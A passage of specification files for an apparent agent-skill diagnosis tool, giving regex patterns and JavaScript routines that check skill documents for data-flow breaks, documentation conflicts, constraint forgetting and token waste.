### Pattern 2: Inconsistent Field Names
```regex
# Same concept with different names: title/name, id/identifier
```
### Pattern 3: Missing Schema Validation
```regex
# Absence of validation before state write
# Look for lack of: validate, schema, check, verify
```
### Pattern 4: Format Transformation Without Normalization
```regex
# Direct JSON.parse without error handling or normalization
/JSON\.parse\([^)]+\)(?!\s*\|\|)/
```
## Execution
```javascript
async function execute(state, workDir) {
const skillPath = state.target_skill.path;
const startTime = Date.now();
const issues = [];
const evidence = [];
console.log(`Diagnosing data flow in ${skillPath}...`);
// 1. Collect all Write operations to map data storage
const allFiles = Glob(`${skillPath}/**/*.md`);
const writeLocations = [];
const readLocations = [];
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Find Write operations
const writeMatches = content.matchAll(/Write\s*\(\s*[`'"]([^`'"]+)[`'"]/g);
for (const match of writeMatches) {
writeLocations.push({
file: relativePath,
target: match[1],
isStateFile: match[1].includes('state.json') || match[1].includes('config.json')
});
}
// Find Read operations
const readMatches = content.matchAll(/Read\s*\(\s*[`'"]([^`'"]+)[`'"]/g);
for (const match of readMatches) {
readLocations.push({
file: relativePath,
source: match[1]
});
}
}
// 2. Check for scattered state storage
const stateTargets = writeLocations
.filter(w => w.isStateFile)
.map(w => w.target);
const uniqueStateFiles = [...new Set(stateTargets)];
if (uniqueStateFiles.length > 2) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'high',
location: { file: 'multiple' },
description: `State stored in ${uniqueStateFiles.length} different locations`,
evidence: uniqueStateFiles.slice(0, 5),
root_cause: 'No centralized state management',
impact: 'State inconsistency between phases',
suggested_fix: 'Centralize state to single state.json with state manager'
});
evidence.push({
file: 'multiple',
pattern: 'scattered_state',
context: uniqueStateFiles.join(', '),
severity: 'high'
});
}
// 3. Check for inconsistent field naming
const fieldNamePatterns = {
'name_vs_title': [/\.name\b/, /\.title\b/],
'id_vs_identifier': [/\.id\b/, /\.identifier\b/],
'status_vs_state': [/\.status\b/, /\.state\b/],
'error_vs_errors': [/\.error\b/, /\.errors\b/]
};
const fieldUsage = {};
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
for (const [patternName, patterns] of Object.entries(fieldNamePatterns)) {
for (const pattern of patterns) {
if (pattern.test(content)) {
if (!fieldUsage[patternName]) fieldUsage[patternName] = [];
fieldUsage[patternName].push({
file: relativePath,
pattern: pattern.toString()
});
}
}
}
}
for (const [patternName, usages] of Object.entries(fieldUsage)) {
const uniquePatterns = [...new Set(usages.map(u => u.pattern))];
if (uniquePatterns.length > 1) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'medium',
location: { file: 'multiple' },
description: `Inconsistent field naming: ${patternName.replace('_vs_', ' vs ')}`,
evidence: usages.slice(0, 3).map(u => `${u.file}: ${u.pattern}`),
root_cause: 'Same concept referred to with different field names',
impact: 'Data may be lost during field access',
suggested_fix: `Standardize to single field name, add normalization function`
});
}
}
// 4. Check for missing schema validation
for (const file of allFiles) {
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
// Find JSON.parse without validation
const unsafeParses = content.match(/JSON\.parse\s*\([^)]+\)(?!\s*\?\?|\s*\|\|)/g);
const hasValidation = /validat|schema|type.*check/i.test(content);
if (unsafeParses && unsafeParses.length > 0 && !hasValidation) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'medium',
location: { file: relativePath },
description: 'JSON parsing without validation',
evidence: unsafeParses.slice(0, 2),
root_cause: 'No schema validation after parsing',
impact: 'Invalid data may propagate through phases',
suggested_fix: 'Add schema validation after JSON.parse'
});
}
}
// 5. Check state schema if exists
const stateSchemaFile = Glob(`${skillPath}/phases/state-schema.md`)[0];
if (stateSchemaFile) {
const schemaContent = Read(stateSchemaFile);
// Check for type definitions
const hasTypeScript = /interface\s+\w+|type\s+\w+\s*=/i.test(schemaContent);
const hasValidationFunction = /function\s+validate|validateState/i.test(schemaContent);
if (hasTypeScript && !hasValidationFunction) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'low',
location: { file: 'phases/state-schema.md' },
description: 'Type definitions without runtime validation',
evidence: ['TypeScript interfaces defined but no validation function'],
root_cause: 'Types are compile-time only, not enforced at runtime',
impact: 'Schema violations may occur at runtime',
suggested_fix: 'Add validateState() function using Zod or manual checks'
});
}
} else if (state.target_skill.execution_mode === 'autonomous') {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'high',
location: { file: 'phases/' },
description: 'Autonomous skill missing state-schema.md',
evidence: ['No state schema definition found'],
root_cause: 'State structure undefined for orchestrator',
impact: 'Inconsistent state handling across actions',
suggested_fix: 'Create phases/state-schema.md with explicit type definitions'
});
}
// 6. Check read-write alignment
const writtenFiles = new Set(writeLocations.map(w => w.target));
const readFiles = new Set(readLocations.map(r => r.source));
const writtenButNotRead = [...writtenFiles].filter(f =>
!readFiles.has(f) && !f.includes('output') && !f.includes('report')
);
if (writtenButNotRead.length > 0) {
issues.push({
id: `DF-${issues.length + 1}`,
type: 'dataflow_break',
severity: 'low',
location: { file: 'multiple' },
description: 'Files written but never read',
evidence: writtenButNotRead.slice(0, 3),
root_cause: 'Orphaned output files',
impact: 'Wasted storage and potential confusion',
suggested_fix: 'Remove unused writes or add reads where needed'
});
}
// 7. Calculate severity
const criticalCount = issues.filter(i => i.severity === 'critical').length;
const highCount = issues.filter(i => i.severity === 'high').length;
const severity = criticalCount > 0 ? 'critical' :
highCount > 1 ? 'high' :
highCount > 0 ? 'medium' :
issues.length > 0 ? 'low' : 'none';
// 8. Write diagnosis result
const diagnosisResult = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: [
'scattered_state',
'inconsistent_naming',
'missing_validation',
'read_write_alignment'
],
patterns_matched: evidence.map(e => e.pattern),
evidence: evidence,
data_flow_map: {
write_locations: writeLocations.length,
read_locations: readLocations.length,
unique_state_files: uniqueStateFiles.length
},
recommendations: [
uniqueStateFiles.length > 2 ? 'Implement centralized state manager' : null,
issues.some(i => i.description.includes('naming'))
? 'Create normalization layer for field names' : null,
issues.some(i => i.description.includes('validation'))
? 'Add Zod or JSON Schema validation' : null
].filter(Boolean)
}
};
Write(`${workDir}/diagnosis/dataflow-diagnosis.json`,
JSON.stringify(diagnosisResult, null, 2));
return {
stateUpdates: {
'diagnosis.dataflow': diagnosisResult,
issues: [...state.issues, ...issues]
},
outputFiles: [`${workDir}/diagnosis/dataflow-diagnosis.json`],
summary: `Data flow diagnosis: ${issues.length} issues found (severity: ${severity})`
};
}
```
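The "schema validation after JSON.parse" and `validateState()` fixes recommended above can be sketched as a manual check. This is a minimal sketch under stated assumptions: the field list (`status`, `issues`) is illustrative; a real `validateState()` should mirror the definitions in phases/state-schema.md (or use a library such as Zod).

```javascript
// Sketch of the suggested fix: validate parsed state before use instead of
// trusting JSON.parse output. The checked fields are an assumption for
// illustration; mirror phases/state-schema.md in a real implementation.
function validateState(raw) {
  let parsed;
  try {
    parsed = typeof raw === 'string' ? JSON.parse(raw) : raw;
  } catch (err) {
    return { ok: false, errors: [`invalid JSON: ${err.message}`] };
  }
  const errors = [];
  if (typeof parsed !== 'object' || parsed === null) {
    errors.push('state must be an object');
  } else {
    if (typeof parsed.status !== 'string') errors.push('status must be a string');
    if (!Array.isArray(parsed.issues)) errors.push('issues must be an array');
  }
  return { ok: errors.length === 0, errors, state: parsed };
}
```

Callers then branch on `ok` and surface `errors` instead of letting malformed data propagate into later phases.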
## State Updates
```javascript
return {
stateUpdates: {
'diagnosis.dataflow': {
status: 'completed',
issues_found: <count>,
severity: '<critical|high|medium|low|none>',
// ... full diagnosis result
},
issues: [...existingIssues, ...newIssues]
}
};
```
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Glob pattern error | Use fallback patterns |
| File read error | Skip and continue |
## Next Actions
- Success: action-diagnose-agent (or next in focus_areas)
- Skipped: If 'dataflow' not in focus_areas

# Action: Diagnose Documentation Structure
Analyze the target skill for documentation redundancy and conflict issues.
## Purpose
- Detect duplicate definitions of the State Schema, mapping tables, type definitions, etc.
- Detect conflicting definitions (inconsistent priority definitions, implementation-documentation drift, etc.)
- Generate suggestions for consolidation and conflict resolution
## Preconditions
- [ ] `state.status === 'running'`
- [ ] `state.target_skill !== null`
- [ ] `!state.diagnosis.docs`
- [ ] 'docs' or 'all' in user-specified focus_areas, OR a full diagnosis is requested
## Detection Patterns
### DOC-RED-001: Core Definition Duplication
Detect State Schema, core interfaces, etc. defined in multiple places:
```javascript
async function detectDefinitionDuplicates(skillPath) {
const patterns = [
{ name: 'state_schema', regex: /interface\s+(TuningState|State)\s*\{/g },
{ name: 'fix_strategy', regex: /type\s+FixStrategy\s*=/g },
{ name: 'issue_type', regex: /type:\s*['"]?(context_explosion|memory_loss|dataflow_break)/g }
];
const files = Glob('**/*.md', { cwd: skillPath });
const duplicates = [];
for (const pattern of patterns) {
const matches = [];
for (const file of files) {
const content = Read(`${skillPath}/${file}`);
pattern.regex.lastIndex = 0; // /g regexes keep lastIndex state; reset between files
if (pattern.regex.test(content)) {
matches.push({ file, pattern: pattern.name });
}
}
if (matches.length > 1) {
duplicates.push({
type: pattern.name,
files: matches.map(m => m.file),
severity: 'high'
});
}
}
return duplicates;
}
```
### DOC-RED-002: Hardcoded Configuration Duplication
Detect duplication between hardcoded values in action files and spec documents:
```javascript
async function detectHardcodedDuplicates(skillPath) {
const actionFiles = Glob('phases/actions/*.md', { cwd: skillPath });
const specFiles = Glob('specs/*.md', { cwd: skillPath });
const duplicates = [];
for (const actionFile of actionFiles) {
const content = Read(`${skillPath}/${actionFile}`);
// Detect hardcoded mapping objects
const hardcodedPatterns = [
/const\s+\w*[Mm]apping\s*=\s*\{/g,
/patternMapping\s*=\s*\{/g,
/strategyMapping\s*=\s*\{/g
];
for (const pattern of hardcodedPatterns) {
if (pattern.test(content)) {
duplicates.push({
type: 'hardcoded_mapping',
file: actionFile,
description: 'Hardcoded mapping may duplicate definitions in specs/',
severity: 'high'
});
}
}
}
return duplicates;
}
```
### DOC-CON-001: Priority Definition Conflicts
Detect inconsistent definitions of priorities such as P0-P3 across files:
```javascript
async function detectPriorityConflicts(skillPath) {
const files = Glob('**/*.md', { cwd: skillPath });
const priorityDefs = {};
const priorityPattern = /\*\*P(\d+)\*\*[:\s]+([^\|]+)/g;
for (const file of files) {
const content = Read(`${skillPath}/${file}`);
let match;
while ((match = priorityPattern.exec(content)) !== null) {
const priority = `P${match[1]}`;
const definition = match[2].trim();
if (!priorityDefs[priority]) {
priorityDefs[priority] = [];
}
priorityDefs[priority].push({ file, definition });
}
}
const conflicts = [];
for (const [priority, defs] of Object.entries(priorityDefs)) {
const uniqueDefs = [...new Set(defs.map(d => d.definition))];
if (uniqueDefs.length > 1) {
conflicts.push({
key: priority,
definitions: defs,
severity: 'critical'
});
}
}
return conflicts;
}
```
### DOC-CON-002: Implementation-Documentation Drift
Detect inconsistencies between hardcoded values and documentation tables:
```javascript
async function detectImplementationDrift(skillPath) {
// Compare category-mappings.json with the tables in specs/*.md
const mappingsFile = `${skillPath}/specs/category-mappings.json`;
if (!fileExists(mappingsFile)) {
return []; // No centralized config; skip
}
const mappings = JSON.parse(Read(mappingsFile));
const conflicts = [];
// Compare against dimension-mapping.md
const dimMapping = Read(`${skillPath}/specs/dimension-mapping.md`);
for (const [category, config] of Object.entries(mappings.categories)) {
// Check whether each strategy is mentioned in the docs
for (const strategy of config.strategies || []) {
if (!dimMapping.includes(strategy)) {
conflicts.push({
type: 'mapping',
key: `${category}.strategies`,
issue: `Strategy ${strategy} is defined in JSON but not mentioned in the docs`
});
}
}
}
return conflicts;
}
```
## Execution
```javascript
async function executeDiagnosis(state, workDir) {
console.log('=== Diagnosing Documentation Structure ===');
const skillPath = state.target_skill.path;
const startTime = Date.now();
const issues = [];
// 1. Detect redundancies
const definitionDups = await detectDefinitionDuplicates(skillPath);
const hardcodedDups = await detectHardcodedDuplicates(skillPath);
for (const dup of [...definitionDups, ...hardcodedDups]) {
issues.push({
id: `DOC-RED-${issues.length + 1}`,
type: 'doc_redundancy',
severity: dup.severity,
location: { files: dup.files || [dup.file] },
description: dup.description || `${dup.type} defined in multiple places`,
evidence: dup.files || [dup.file],
root_cause: 'No single source of truth',
impact: 'Hard to maintain; prone to inconsistency',
suggested_fix: 'consolidate_to_ssot'
});
}
// 2. Detect conflicts
const priorityConflicts = await detectPriorityConflicts(skillPath);
const driftConflicts = await detectImplementationDrift(skillPath);
for (const conflict of priorityConflicts) {
issues.push({
id: `DOC-CON-${issues.length + 1}`,
type: 'doc_conflict',
severity: 'critical',
location: { files: conflict.definitions.map(d => d.file) },
description: `${conflict.key} defined inconsistently across files`,
evidence: conflict.definitions.map(d => `${d.file}: ${d.definition}`),
root_cause: 'Definitions updated without synchronization',
impact: 'Unpredictable behavior',
suggested_fix: 'reconcile_conflicting_definitions'
});
}
// 3. Generate report
const severity = issues.some(i => i.severity === 'critical') ? 'critical' :
issues.some(i => i.severity === 'high') ? 'high' :
issues.length > 0 ? 'medium' : 'none';
const result = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: ['DOC-RED-001', 'DOC-RED-002', 'DOC-CON-001', 'DOC-CON-002'],
patterns_matched: issues.map(i => i.id.split('-').slice(0, 2).join('-')),
evidence: issues.flatMap(i => i.evidence),
recommendations: generateRecommendations(issues)
},
redundancies: issues.filter(i => i.type === 'doc_redundancy'),
conflicts: issues.filter(i => i.type === 'doc_conflict')
};
// Write diagnosis result
Write(`${workDir}/diagnosis/docs-diagnosis.json`, JSON.stringify(result, null, 2));
return {
stateUpdates: {
'diagnosis.docs': result,
issues: [...state.issues, ...issues]
},
outputFiles: [`${workDir}/diagnosis/docs-diagnosis.json`],
summary: `Docs diagnosis: ${issues.length} issues found (severity: ${severity})`
};
}
function generateRecommendations(issues) {
const recommendations = [];
if (issues.some(i => i.type === 'doc_redundancy')) {
recommendations.push('Use the consolidate_to_ssot strategy to merge duplicate definitions');
recommendations.push('Consider creating specs/category-mappings.json to centralize configuration');
}
if (issues.some(i => i.type === 'doc_conflict')) {
recommendations.push('Use the reconcile_conflicting_definitions strategy to resolve conflicts');
recommendations.push('Establish a documentation sync check mechanism');
}
return recommendations;
}
```
## Output
### State Updates
```javascript
{
stateUpdates: {
'diagnosis.docs': {
status: 'completed',
issues_found: N,
severity: 'critical|high|medium|low|none',
redundancies: [...],
conflicts: [...]
},
issues: [...existingIssues, ...newIssues]
}
}
```
### Output Files
- `${workDir}/diagnosis/docs-diagnosis.json` - full diagnosis result
## Error Handling
| Error | Recovery |
|-------|----------|
| File read error | Log a warning, continue with other files |
| Regex match timeout | Skip the pattern, record it as skipped |
| JSON parse error | Skip config comparison, run pattern detection only |
## Next Actions
- Critical issues found → proceed to action-propose-fixes first
- No issues → continue to the next diagnosis or action-generate-report

# Action: Diagnose Long-tail Forgetting
Analyze target skill for long-tail effect and constraint forgetting issues.
## Purpose
- Detect loss of early instructions in long execution chains
- Identify missing constraint propagation mechanisms
- Find weak goal alignment between phases
- Measure instruction retention across phases
## Preconditions
- [ ] state.status === 'running'
- [ ] state.target_skill.path is set
- [ ] 'memory' in state.focus_areas OR state.focus_areas is empty
## Detection Patterns
### Pattern 1: Missing Constraint References
```regex
# Phases that don't reference original requirements
# Look for absence of: requirements, constraints, original, initial, user_request
```
### Pattern 2: Goal Drift
```regex
# Later phases focus on immediate task without global context
/\[TASK\][^[]*(?!\[CONSTRAINTS\]|\[REQUIREMENTS\])/
```
### Pattern 3: No Checkpoint Mechanism
```regex
# Absence of state preservation at key points
# Look for lack of: checkpoint, snapshot, preserve, restore
```
### Pattern 4: Implicit State Passing
```regex
# State passed implicitly through conversation rather than explicitly
/(?<!state\.)context\./
```
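The explicit alternative to implicit context passing, carrying the original constraints in state and injecting them into every phase prompt, can be sketched as follows. This is a minimal sketch: the `state.original_constraints` field and the helper name are illustrative assumptions aligned with the suggested fixes in this action.

```javascript
// Sketch of explicit constraint propagation: store original constraints in
// state once, then inject them into each phase prompt instead of relying on
// implicit conversational context. Names here are illustrative assumptions.
function buildPhasePrompt(state, taskText) {
  const constraints = state.original_constraints || [];
  const constraintBlock = constraints.length
    ? `[CONSTRAINTS]\n${constraints.map(c => `- ${c}`).join('\n')}\n`
    : '';
  return `${constraintBlock}[TASK]\n${taskText}`;
}
```

Because every phase prompt is rebuilt from state, constraints survive arbitrarily long execution chains instead of fading with conversational distance.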
## Execution
```javascript
async function execute(state, workDir) {
const skillPath = state.target_skill.path;
const startTime = Date.now();
const issues = [];
const evidence = [];
console.log(`Diagnosing long-tail forgetting in ${skillPath}...`);
// 1. Analyze phase chain for constraint propagation
const phaseFiles = Glob(`${skillPath}/phases/*.md`)
.filter(f => !f.includes('orchestrator') && !f.includes('state-schema'))
.sort();
// Extract phase order (for sequential) or action dependencies (for autonomous)
const isAutonomous = state.target_skill.execution_mode === 'autonomous';
// 2. Check each phase for constraint awareness
let firstPhaseConstraints = [];
for (let i = 0; i < phaseFiles.length; i++) {
const file = phaseFiles[i];
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
const phaseNum = i + 1;
// Extract constraints from first phase
if (i === 0) {
const constraintMatch = content.match(/\[CONSTRAINTS?\]([^[]*)/i);
if (constraintMatch) {
firstPhaseConstraints = constraintMatch[1]
.split('\n')
.filter(l => l.trim().startsWith('-'))
.map(l => l.trim().replace(/^-\s*/, ''));
}
}
// Check if later phases reference original constraints
if (i > 0 && firstPhaseConstraints.length > 0) {
const mentionsConstraints = firstPhaseConstraints.some(c =>
content.toLowerCase().includes(c.toLowerCase().slice(0, 20))
);
if (!mentionsConstraints) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'high',
location: { file: relativePath, phase: `Phase ${phaseNum}` },
description: `Phase ${phaseNum} does not reference original constraints`,
evidence: [`Original constraints: ${firstPhaseConstraints.slice(0, 3).join(', ')}`],
root_cause: 'Constraint information not propagated to later phases',
impact: 'May produce output violating original requirements',
suggested_fix: 'Add explicit constraint injection or reference to state.original_constraints'
});
evidence.push({
file: relativePath,
pattern: 'missing_constraint_reference',
context: `Phase ${phaseNum} of ${phaseFiles.length}`,
severity: 'high'
});
}
}
// Check for goal drift - task without constraints
const hasTask = /\[TASK\]/i.test(content);
const hasConstraints = /\[CONSTRAINTS?\]|\[REQUIREMENTS?\]|\[RULES?\]/i.test(content);
if (hasTask && !hasConstraints && i > 1) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'medium',
location: { file: relativePath },
description: 'Phase has TASK but no CONSTRAINTS/RULES section',
evidence: ['Task defined without boundary constraints'],
root_cause: 'Agent may not adhere to global constraints',
impact: 'Potential goal drift from original intent',
suggested_fix: 'Add [CONSTRAINTS] section referencing global rules'
});
}
// Check for checkpoint mechanism
const hasCheckpoint = /checkpoint|snapshot|preserve|savepoint/i.test(content);
const isKeyPhase = i === Math.floor(phaseFiles.length / 2) || i === phaseFiles.length - 1;
if (isKeyPhase && !hasCheckpoint && phaseFiles.length > 3) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'low',
location: { file: relativePath },
description: 'Key phase without checkpoint mechanism',
evidence: [`Phase ${phaseNum} is a key milestone but has no state preservation`],
root_cause: 'Cannot recover from failures or verify constraint adherence',
impact: 'No rollback capability if constraints violated',
suggested_fix: 'Add checkpoint before major state changes'
});
}
}
// 3. Check for explicit state schema with constraints field
const stateSchemaFile = Glob(`${skillPath}/phases/state-schema.md`)[0];
if (stateSchemaFile) {
const schemaContent = Read(stateSchemaFile);
const hasConstraintsField = /constraints|requirements|original_request/i.test(schemaContent);
if (!hasConstraintsField) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'medium',
location: { file: 'phases/state-schema.md' },
description: 'State schema lacks constraints/requirements field',
evidence: ['No dedicated field for preserving original requirements'],
root_cause: 'State structure does not support constraint persistence',
impact: 'Constraints may be lost during state transitions',
suggested_fix: 'Add original_requirements field to state schema'
});
}
}
// 4. Check SKILL.md for constraint enforcement in execution flow
const skillMd = Read(`${skillPath}/SKILL.md`);
const hasConstraintVerification = /constraint.*verif|verif.*constraint|quality.*gate/i.test(skillMd);
if (!hasConstraintVerification && phaseFiles.length > 3) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'medium',
location: { file: 'SKILL.md' },
description: 'No constraint verification step in execution flow',
evidence: ['Execution flow lacks quality gate or constraint check'],
root_cause: 'No mechanism to verify output matches original intent',
impact: 'Constraint violations may go undetected',
suggested_fix: 'Add verification phase comparing output to original requirements'
});
}
// 5. Calculate severity
const criticalCount = issues.filter(i => i.severity === 'critical').length;
const highCount = issues.filter(i => i.severity === 'high').length;
const severity = criticalCount > 0 ? 'critical' :
highCount > 2 ? 'high' :
highCount > 0 ? 'medium' :
issues.length > 0 ? 'low' : 'none';
// 6. Write diagnosis result
const diagnosisResult = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: [
'constraint_propagation',
'goal_drift',
'checkpoint_mechanism',
'state_schema_constraints'
],
patterns_matched: evidence.map(e => e.pattern),
evidence: evidence,
phase_analysis: {
total_phases: phaseFiles.length,
first_phase_constraints: firstPhaseConstraints.length,
phases_with_constraint_ref: phaseFiles.length - issues.filter(i =>
i.description.includes('does not reference')).length
},
recommendations: [
highCount > 0 ? 'Implement constraint injection at each phase' : null,
issues.some(i => i.description.includes('checkpoint'))
? 'Add checkpoint/restore mechanism' : null,
issues.some(i => i.description.includes('State schema'))
? 'Add original_requirements to state schema' : null
].filter(Boolean)
}
};
Write(`${workDir}/diagnosis/memory-diagnosis.json`,
JSON.stringify(diagnosisResult, null, 2));
return {
stateUpdates: {
'diagnosis.memory': diagnosisResult,
issues: [...state.issues, ...issues]
},
outputFiles: [`${workDir}/diagnosis/memory-diagnosis.json`],
summary: `Memory diagnosis: ${issues.length} issues found (severity: ${severity})`
};
}
```
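The `[CONSTRAINTS]` extraction in step 2 above can be exercised standalone. A minimal sketch in plain Node, with a sample phase body inlined in place of the `Read()` tool call (the sample text is illustrative, not from a real skill):

```javascript
// Same regex and bullet parsing as the diagnosis code above,
// applied to an inlined sample instead of a file read.
const sample = [
  "## Phase 1",
  "[CONSTRAINTS]",
  "- Output must be valid JSON",
  "- Keep responses under 500 tokens",
  "[TASK]",
  "Analyze the input."
].join("\n");

const m = sample.match(/\[CONSTRAINTS?\]([^[]*)/i);
const constraints = m
  ? m[1].split("\n")
      .filter(l => l.trim().startsWith("-"))
      .map(l => l.trim().replace(/^-\s*/, ""))
  : [];

console.log(constraints);
// ["Output must be valid JSON", "Keep responses under 500 tokens"]
```

Note that `[^[]*` stops the capture at the next bracketed section header (here `[TASK]`), which is what keeps the extraction scoped to the constraints block.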
## State Updates
```javascript
return {
stateUpdates: {
'diagnosis.memory': {
status: 'completed',
issues_found: <count>,
severity: '<critical|high|medium|low|none>',
// ... full diagnosis result
},
issues: [...existingIssues, ...newIssues]
}
};
```
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Phase file read error | Skip file, continue analysis |
| No phases found | Report as structure issue |
## Next Actions
- Success: action-diagnose-dataflow (or next in focus_areas)
- Skipped: If 'memory' not in focus_areas

# Action: Diagnose Token Consumption
Analyze target skill for token consumption inefficiencies and output optimization opportunities.
## Purpose
Detect patterns that cause excessive token usage:
- Verbose prompts without compression
- Large state objects with unnecessary fields
- Full content passing instead of references
- Unbounded arrays without sliding windows
- Redundant file I/O (write-then-read patterns)
## Detection Patterns
| Pattern ID | Name | Detection Logic | Severity |
|------------|------|-----------------|----------|
| TKN-001 | Verbose Prompts | Prompt files > 4KB or high static/variable ratio | medium |
| TKN-002 | Excessive State Fields | State schema > 15 top-level keys | medium |
| TKN-003 | Full Content Passing | `Read()` result embedded directly in prompt | high |
| TKN-004 | Unbounded Arrays | `.push`/`concat` without `.slice(-N)` | high |
| TKN-005 | Redundant Write→Read | `Write(file)` followed by `Read(file)` | medium |
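The detection logic in the table is regex-driven; a minimal sketch of how the TKN-004 and TKN-005 patterns behave on sample snippets (standalone, no file I/O, sample strings invented for illustration):

```javascript
// Regexes taken from the execution steps below.
const unbounded = /\.(push|concat)\([^)]+\)(?!.*\.slice)/;
const writeRead = /Write\([^)]+\)[\s\S]{0,100}Read\([^)]+\)/;

const grows = "state.history.push(entry);";
const bounded = "state.history.push(entry); state.history = state.history.slice(-20);";
const relay = "Write(tmpFile, data);\nconst back = Read(tmpFile);";

console.log(unbounded.test(grows));   // true  — growth with no .slice -> flagged
console.log(unbounded.test(bounded)); // false — .slice(-N) present -> not flagged
console.log(writeRead.test(relay));   // true  — Read within 100 chars of Write -> flagged
```

The `(?!.*\.slice)` lookahead is what suppresses TKN-004 when a bounding `.slice(-N)` appears later on the same line, and the `{0,100}` window is what limits TKN-005 to write-then-read pairs in close proximity.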
## Execution Steps
```javascript
async function diagnoseTokenConsumption(state, workDir) {
const startTime = Date.now(); // referenced below when reporting execution_time_ms
const evidence = [];
const skillPath = state.target_skill.path;
// 1. Scan for verbose prompts (TKN-001)
const mdFiles = Glob(`${skillPath}/**/*.md`);
for (const file of mdFiles) {
const content = Read(file);
if (content.length > 4000) {
evidence.push({
file: file,
pattern: 'TKN-001',
severity: 'medium',
context: `File size: ${content.length} chars (threshold: 4000)`
});
}
}
// 2. Check state schema field count (TKN-002)
const stateSchema = Glob(`${skillPath}/**/state-schema.md`)[0];
if (stateSchema) {
const schemaContent = Read(stateSchema);
const fieldMatches = schemaContent.match(/^\s*\w+:/gm) || [];
if (fieldMatches.length > 15) {
evidence.push({
file: stateSchema,
pattern: 'TKN-002',
severity: 'medium',
context: `State has ${fieldMatches.length} fields (threshold: 15)`
});
}
}
// 3. Detect full content passing (TKN-003)
const fullContentPattern = /Read\([^)]+\)\s*[\+,]|`\$\{.*Read\(/g;
for (const file of mdFiles) {
const content = Read(file);
const matches = content.match(fullContentPattern);
if (matches) {
evidence.push({
file: file,
pattern: 'TKN-003',
severity: 'high',
context: `Full content passing detected: ${matches[0]}`
});
}
}
// 4. Detect unbounded arrays (TKN-004)
const unboundedPattern = /\.(push|concat)\([^)]+\)(?!.*\.slice)/g;
for (const file of mdFiles) {
const content = Read(file);
const matches = content.match(unboundedPattern);
if (matches) {
evidence.push({
file: file,
pattern: 'TKN-004',
severity: 'high',
context: `Unbounded array growth: ${matches[0]}`
});
}
}
// 5. Detect write-then-read patterns (TKN-005)
const writeReadPattern = /Write\([^)]+\)[\s\S]{0,100}Read\([^)]+\)/g;
for (const file of mdFiles) {
const content = Read(file);
const matches = content.match(writeReadPattern);
if (matches) {
evidence.push({
file: file,
pattern: 'TKN-005',
severity: 'medium',
context: `Write-then-read pattern detected`
});
}
}
// Calculate severity
const highCount = evidence.filter(e => e.severity === 'high').length;
const mediumCount = evidence.filter(e => e.severity === 'medium').length;
let severity = 'none';
if (highCount > 0) severity = 'high';
else if (mediumCount > 2) severity = 'medium';
else if (mediumCount > 0) severity = 'low';
return {
status: 'completed',
issues_found: evidence.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: ['TKN-001', 'TKN-002', 'TKN-003', 'TKN-004', 'TKN-005'],
patterns_matched: [...new Set(evidence.map(e => e.pattern))],
evidence: evidence,
recommendations: generateRecommendations(evidence)
}
};
}
function generateRecommendations(evidence) {
const recs = [];
const patterns = [...new Set(evidence.map(e => e.pattern))];
if (patterns.includes('TKN-001')) {
recs.push('Apply prompt_compression: Extract static instructions to templates, use placeholders');
}
if (patterns.includes('TKN-002')) {
recs.push('Apply state_field_reduction: Remove debug/cache fields, consolidate related fields');
}
if (patterns.includes('TKN-003')) {
recs.push('Apply lazy_loading: Pass file paths instead of content, let agents read if needed');
}
if (patterns.includes('TKN-004')) {
recs.push('Apply sliding_window: Add .slice(-N) to array operations to bound growth');
}
if (patterns.includes('TKN-005')) {
recs.push('Apply output_minimization: Use in-memory data passing, eliminate temporary files');
}
return recs;
}
```
## Output
Write the diagnosis result to `${workDir}/diagnosis/token-consumption-diagnosis.json`:
```json
{
"status": "completed",
"issues_found": 3,
"severity": "medium",
"execution_time_ms": 1500,
"details": {
"patterns_checked": ["TKN-001", "TKN-002", "TKN-003", "TKN-004", "TKN-005"],
"patterns_matched": ["TKN-001", "TKN-003"],
"evidence": [
{
"file": "phases/orchestrator.md",
"pattern": "TKN-001",
"severity": "medium",
"context": "File size: 5200 chars (threshold: 4000)"
}
],
"recommendations": [
"Apply prompt_compression: Extract static instructions to templates"
]
}
}
```
## State Update
```javascript
updateState({
diagnosis: {
...state.diagnosis,
token_consumption: diagnosisResult
}
});
```
## Fix Strategies Mapping
| Pattern | Strategy | Implementation |
|---------|----------|----------------|
| TKN-001 | prompt_compression | Extract static text to variables, use template inheritance |
| TKN-002 | state_field_reduction | Audit and consolidate fields, remove non-essential data |
| TKN-003 | lazy_loading | Pass paths instead of content, agents load when needed |
| TKN-004 | sliding_window | Add `.slice(-N)` after push/concat operations |
| TKN-005 | output_minimization | Use return values instead of file relay |
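The TKN-004 fix (sliding_window) can be sketched as a bounded append. `MAX_ENTRIES` is an illustrative constant, not part of the original skill:

```javascript
// Bound an append-only log to the last N entries so state size
// stays constant no matter how many iterations run.
const MAX_ENTRIES = 20;

function appendBounded(log, entry) {
  // push, then keep only the most recent MAX_ENTRIES items
  return [...log, entry].slice(-MAX_ENTRIES);
}

let history = [];
for (let i = 0; i < 50; i++) {
  history = appendBounded(history, { step: i });
}
console.log(history.length);  // 20
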